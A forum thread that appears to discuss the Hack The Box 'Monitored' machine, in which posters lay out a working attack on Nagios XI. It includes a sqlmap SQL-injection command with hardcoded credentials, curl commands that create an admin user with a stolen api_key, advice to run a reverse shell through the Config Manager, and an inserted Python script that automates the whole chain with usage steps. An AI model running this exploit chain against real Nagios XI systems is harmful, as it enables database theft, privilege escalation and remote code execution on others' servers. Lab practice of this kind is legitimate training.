Monitored - HTB
by paven - Saturday January 13, 2024 at 12:13 PM
#41
(Jan 14, 2024, 07:28 AM)yonigga Wrote: get the admin api_key, which you have in xi_users from sqlmap, to add a new user with admin privileges --> log in with the created user with admin privileges, add cmd --> rev shell, gg

How can I add a new user? Should I use curl?
#42
(Jan 14, 2024, 07:28 AM)yonigga Wrote: get the admin api_key, which you have in xi_users from sqlmap, to add a new user with admin privileges --> log in with the created user with admin privileges, add cmd --> rev shell, gg

curl -k -X POST -H "Authorization: Bearer IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL" -H "Content-Type: application/json" -d '{"username": "test", "abcd": "abcd"}' https://nagios.monitored.htb/nagiosxi/api/v1/users
{"error":"No API Key provided"}

but it's not working

#43
(Jan 14, 2024, 07:59 AM)godzilla Wrote:
(Jan 14, 2024, 07:28 AM)yonigga Wrote: get the admin api_key, which you have in xi_users from sqlmap, to add a new user with admin privileges --> log in with the created user with admin privileges, add cmd --> rev shell, gg

curl -k -X POST -H "Authorization: Bearer IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL" -H "Content-Type: application/json" -d '{"username": "test", "abcd": "abcd"}' https://nagios.monitored.htb/nagiosxi/api/v1/users
{"error":"No API Key provided"}

but it's not working

i added the new user with this command

curl -XPOST --insecure "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=myadmin&password=myadmin&name=myadmin&email=myadmin@LocalHost&auth_level=admin"
#44
(Jan 14, 2024, 07:28 AM)yonigga Wrote: get the admin api_key, which you have in xi_users from sqlmap, to add a new user with admin privileges --> log in with the created user with admin privileges, add cmd --> rev shell, gg

I can add users, but how do you add them as admins? I've tried a few parameters with no luck.
#45
(Jan 14, 2024, 08:14 AM)wardensec Wrote:
(Jan 14, 2024, 07:28 AM)yonigga Wrote: get the admin api_key, which you have in xi_users from sqlmap, to add a new user with admin privileges --> log in with the created user with admin privileges, add cmd --> rev shell, gg

I can add users, but how do you add them as admins? I've tried a few parameters with no luck.

Add an admin user like this:

curl -X POST "http://{IP}/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=test&password=test&name=test&email=test@LocalHost&auth_level=admin"
#46
I got an admin user, but how can I add a revshell?
#47
(Jan 14, 2024, 08:25 AM)ohmical Wrote:
(Jan 14, 2024, 08:14 AM)wardensec Wrote:
(Jan 14, 2024, 07:28 AM)yonigga Wrote: get the admin api_key, which you have in xi_users from sqlmap, to add a new user with admin privileges --> log in with the created user with admin privileges, add cmd --> rev shell, gg

I can add users, but how do you add them as admins? I've tried a few parameters with no luck.

Add an admin user like this:

curl -X POST "http://{IP}/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=test&password=test&name=test&email=test@LocalHost&auth_level=admin"
How to get the apikey? Thank u.
#48
(Jan 14, 2024, 08:27 AM)jyosun Wrote: I got an admin user, but how can I add a revshell?
Well, log in to Nagios and use its interface? What about the configuration menu? If you're an admin user, you can access this.

Config manager, add new command and run it...

(Jan 14, 2024, 08:49 AM)St4rry Wrote: How to get the apikey? Thank u.

That's what you get from the SQLi. You will get the API key. No need to crack the blowfish hashes; you won't get any result either.

With that API key you will add a new user (google this, there's an exact command on the Nagios forum). Don't forget to create an admin-elevated user if you're creating one, right? Otherwise what's the point...

And with that newly generated user, log in to the nagiosxi webui and use it: add a new command such as a revshell and run it...
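The chain the posts above describe (authenticate as the low-privileged user, point sqlmap at the id parameter of banner_message-ajaxhelper.php, pull the admin api_key out of xi_users, then create an admin account through the API) written out as a small Python script. This is an added example, not code from the thread or from Nagios XI. It assumes the /api/v1/authenticate response carries the token in an auth_token field, it disables TLS verification the way curl -k does for the lab's certificate, and the host, paths and parameter names are the ones the posts use; credentials and the api_key are taken from the command line rather than hardcoded.

```python
# Added example (not from the thread): Nagios XI foothold chain as a script.
# Assumptions are marked inline; host/paths are those used in the thread.
import json
import shlex
import ssl
import sys
import urllib.parse
import urllib.request

BASE = "https://nagios.monitored.htb/nagiosxi/"  # trailing slash matters for urljoin


def http_post(url, data, timeout=15):
    """Real transport: form-encoded POST. TLS verification is disabled to
    mirror `curl -k` against the lab's self-signed certificate (lab use only)."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(
        url, data=urllib.parse.urlencode(data).encode(), method="POST")
    with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
        return resp.read().decode()


def get_auth_token(post, base, username, password, valid_min=500):
    """Step 1: /api/v1/authenticate issues a short-lived token; the thread
    passes valid_min=500 so the token outlives a long sqlmap run.
    Assumption: the JSON response carries the token in an "auth_token" field."""
    url = urllib.parse.urljoin(base, "api/v1/authenticate")
    body = post(url, {"username": username, "password": password,
                      "valid_min": valid_min})
    doc = json.loads(body)
    if "auth_token" not in doc:
        raise RuntimeError(f"authentication failed: {body.strip()}")
    return doc["auth_token"]


def sqlmap_target(base, token, message_id=3):
    """Step 2: the injectable URL from post #49 (id parameter of
    acknowledge_banner_message) with a fresh token substituted in."""
    query = urllib.parse.urlencode(
        {"action": "acknowledge_banner_message", "id": message_id, "token": token})
    return urllib.parse.urljoin(base, "admin/banner_message-ajaxhelper.php") + "?" + query


def sqlmap_argv(target):
    """The sqlmap invocation from the thread, narrowed to the xi_users table
    that holds the admin api_key (the blowfish password hashes are not needed)."""
    return ["sqlmap", "-u", target, "--level", "5", "--risk", "3", "-p", "id",
            "--batch", "-D", "nagiosxi", "-T", "xi_users", "--dump"]


def build_create_user_request(base, apikey, username, password, email):
    """Step 3: the request shape that worked in posts #43/#45. The key goes in
    the apikey query parameter (post #42's Bearer header got "No API Key
    provided") and auth_level=admin is what makes the account an administrator."""
    url = (urllib.parse.urljoin(base, "api/v1/system/user")
           + "?" + urllib.parse.urlencode({"apikey": apikey, "pretty": 1}))
    data = {"username": username, "password": password, "name": username,
            "email": email, "auth_level": "admin"}
    return url, data


def create_admin_user(post, base, apikey, username, password, email):
    """Send the step-3 request and return the parsed JSON reply."""
    url, data = build_create_user_request(base, apikey, username, password, email)
    return json.loads(post(url, data))


if __name__ == "__main__":
    # Usage: python3 chain.py <user> <password>            -> prints sqlmap command
    #        python3 chain.py <user> <password> <api_key>  -> creates admin "myadmin"
    user, pw = sys.argv[1], sys.argv[2]
    if len(sys.argv) < 4:
        tok = get_auth_token(http_post, BASE, user, pw)
        print(shlex.join(sqlmap_argv(sqlmap_target(BASE, tok))))
    else:
        print(create_admin_user(http_post, BASE, sys.argv[3],
                                "myadmin", "myadmin", "myadmin@localhost"))
```

The transport is passed in as a callable so the request-building logic can be exercised without a live target; once sqlmap has dumped xi_users, run the script a second time with the recovered api_key and log in to the web UI with the new account, then add and run a command from the Config Manager as post #48 describes.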
#49
(Jan 14, 2024, 05:34 AM)arrogant Wrote: glhf
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi --dump

How did you find this endpoint?
https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=
#50
(Jan 14, 2024, 08:50 AM)peRd1 Wrote:
(Jan 14, 2024, 08:27 AM)jyosun Wrote: I got an admin user, but how can I add a revshell?
Well, log in to Nagios and use its interface? What about the configuration menu? If you're an admin user, you can access this.

Config manager, add new command and run it...

(Jan 14, 2024, 08:49 AM)St4rry Wrote: How to get the apikey? Thank u.

That's what you get from the SQLi. You will get the API key. No need to crack the blowfish hashes; you won't get any result either.

With that API key you will add a new user (google this, there's an exact command on the Nagios forum). Don't forget to create an admin-elevated user if you're creating one, right? Otherwise what's the point...

And with that newly generated user, log in to the nagiosxi webui and use it: add a new command such as a revshell and run it...

Thank u. I am so stupid.